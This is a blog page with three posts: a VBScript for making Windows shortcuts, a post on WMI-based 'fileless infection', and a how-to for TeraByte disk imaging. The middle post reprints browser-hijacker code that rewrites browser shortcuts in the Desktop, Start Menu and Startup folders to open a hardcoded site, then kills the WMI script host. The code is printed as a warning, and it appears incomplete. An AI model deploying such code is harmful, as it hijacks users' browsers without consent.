Write a complicated VBscript to create a link

First you have to create a small text file by the name mkshortcut.vbs. Use your favorite text editor to edit the file, even notepad will do. Then copy the following text and paste it into the file:

set WshShell = WScript.CreateObject(“WScript.Shell” )
set oShellLink = WshShell.CreateShortcut(Wscript.Arguments.Named(“shortcut”) & “.lnk”)
oShellLink.TargetPath = Wscript.Arguments.Named(“target”)
oShellLink.WindowStyle = 1

Then save the file and exit the editor. Make sure that you move the file in a directory in your PATH (usually C:WINDOWS\System32 is fine). Now, from the command line you can create shortcuts this way:

mkshortcut /target:TargetName /shortcut:c:\users\<you>\desktop\ShortcutName

You will have to replace TargetName with the name of the target file and ShortcutName with the name of the shortcut to be created (do not include a .lnk extension!). For example:

C:>mkshortcut /target:”c:/documents and settings/<you>/desktop” /shortcut:”My Desktop”

Posted in Uncategorized | Leave a comment

Fileless infection using wmi

Ok that sounds all sorts of wrong or confusing.

“Windows Management Instrumentation (WMI) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), which is an industry initiative to develop a standard technology for accessing management information in an enterprise environment.” Credit

Still sounds a little like WTFunction?

Well think of WMI as a database for objects within windows.

Ok now we are done with that.

CODE in a VB script for infection (run in browser)

Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
	BrowserDic.Add LCase(browser), browser
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\User\Desktop"
FoldersDic(5) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\User\AppData\Roaming\Roaming"
FoldersDic(9) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
	For Each file In fso.GetFolder(FoldersDic(i)).Files
		If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
			set oShellLink = WshShell.CreateShortcut(file.Path)
			path = oShellLink.TargetPath
			name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
			If BrowserDic.Exists(LCase(name)) Then
				oShellLink.Arguments = link
				If file.Attributes And 1 Then
					file.Attributes = file.Attributes - 1
				End If
			End If
		End If
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

So what the heck? that is great code but how does this work or why?

Go to a website that has been compromised. Has a tiny little jscript or vbscript that runs in your browser.

In the code lifted from the source article shows the shortcut target adding an extra web site at the end thus making you go to a certain site because the shortcut is being told to.

starting WBEMTest we need to run it with administrator privileges. To do this, right click on the C:\Windows\System32\wbemtest.exe executable and then select Run as Administrator.  WBEMTest will now start.

This will help you to evaluate WMI infection that is spreading to your shortcuts.

This is nothing new but looks like its the next wave of spyware/hijackers to be concerned with.

Posted in Interesting, Microsoft, Security | Leave a comment

Terabyte scripting for auto install

Been using Terabyte backup software for a few years. Thought I would share a how to on the subject.

This is for installing from a .tbi file created when a machine has had the OS captured. Think ghosting but with a different name.

IMAGE.EXE /r /clr /t /x /log:0 /bgp /ubi /d:1 /f:”u0@0x0:\YourBackup.tbi”

Use Magic ISO to create the bootable Iso from tbi files

Use the terabyte 2.66 backup disk

Use external Drive to backup data move tbi files created
Terabyte 2.66 Backup Disk:
on dell boot hit the f12 key and boot from cd/dvd rom
once image for dos 2.66
select backup click next
select Full Backup
select BIOS (Backup From) ‘Enter’
*Since you will have an external drive connected you will have 2 options for Hard Drive selection.
select Hard Drive 0 ‘Enter’
select MIB Entire Drive press the space bar so that this drive is selected. ‘Enter’
select Single File Set (Backup) ‘Enter’
select File (Direct) ‘Enter’
select BIOS (Backup From) ‘Enter’
select Hard Drive 1 (Backup To) ‘Enter’
select the partion on the second drive you want to backup to. ‘Enter’
In Name put the <name of software><version><Machine model> example: MyLameDesktop

Select (Omit Page File Data), (Omit Hibernation Data), De-Select (Log Results to File)
Tab over to File Size and select (2 GiB) ‘Enter’
‘Enter’ To begin process.
Once done reboot the PC.

Take the external drive and move it over to the machine you will be building the burnable ISO on. (*Do a MEMSTAT check on the PC before doing this).

Install Magic Iso (make sure you have a valid License. Otherwise you will not be able to build an iso over 600mb.)
Use the Floppy Boot Image.bif as your boot image.
*You will need to edit the TBOS.STR file to reflect the correct files.
IMAGE.EXE /r /clr /t /x /ubi /d:0 /f:”o0:\MyLameServer.tbi” <- Change MyLameServer.tbi to the correct: <name of software><version><Machine model> example: MyLameServer.tbi

To edit the file you will need to open magic iso and open the “Floppy Boot Image.bif” file and copy the TBOS.STR file to your desktop to edit the string (as seen above)
Once it is edited then you can drag and drop the TBOS.STR to the Magic Iso Application and overwrite the current file. Make sure to select save.

Once this is complete then open a new file click on create a bootable ISO choose the “Floppy Boot Image.bif” and click ok.

Magic Iso will reflect that the current project is now bootable.
Now drag and drop your TBI files from the hard drive (Make sure they are the correctly named and numbered files).
Once this is done click on File and scrool down to save as.
Save as: The <name of software><version><Machine model> example: MyLameServer.ISO

Now to burn the Disc.
Put in a Dual Layer DVD and use windows Image Burner.
Right click on the ISO file and scroll down to Open with: Windows Disc Image Burner.

Choose the correct DVD burner and Click burn.

This may take 45min to 60min’s
Once this is completed take the disk and be careful not to touch the written side of the disk and place it in the pc you are going to image.

On the Dell boot hit the f12 key and boot from cd/dvd rom
once it boots it will ask you what drive to restore to.
select the Hard Drive 0 ‘Enter’
Allow image to decompress and image the hard drive. This may take up to 90 mins.

Posted in How To | Leave a comment